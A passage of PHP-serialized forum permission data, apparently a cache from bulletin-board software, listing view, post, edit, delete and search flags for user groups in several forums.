:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"103\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"104\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"105\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"190\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"224\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"295\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"651\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"767\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:29;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"106\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"107\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"108\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"109\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"110\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"191\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"225\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"296\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"652\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"768\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:54;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"205\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"206\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"207\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"208\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"209\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"210\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"233\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"304\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"660\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"776\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:30;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"842\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"843\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"844\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"845\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"846\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"847\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\